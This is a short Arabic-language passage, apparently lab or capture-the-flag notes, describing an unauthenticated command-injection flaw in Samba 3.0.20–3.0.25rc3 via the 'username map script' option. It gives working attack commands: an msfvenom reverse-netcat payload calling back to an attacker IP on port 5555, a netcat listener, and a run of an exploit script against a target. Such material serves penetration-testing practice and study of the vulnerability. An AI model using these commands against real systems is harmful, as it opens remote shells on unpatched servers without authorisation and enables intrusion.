
تستغل هذه الوحدة ثغرة تنفيذ أوامر في إصدارات Samba من 3.0.20 إلى 3.0.25rc3 عند استخدام خيار الإعدادات غير الافتراضي "username map script". من خلال تحديد اسم مستخدم يحتوي على محارف شل (shell meta characters)، يمكن للمهاجمين تنفيذ أوامر عشوائية. لا يلزم أي مصادقة لاستغلال هذه الثغرة لأن هذا الخيار يُستخدم لتعيين أسماء المستخدمين قبل المصادقة!
msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.56 LPORT=5555 -f python
nc -nlvp 5555
python3 smbusermap.py <Target IP>
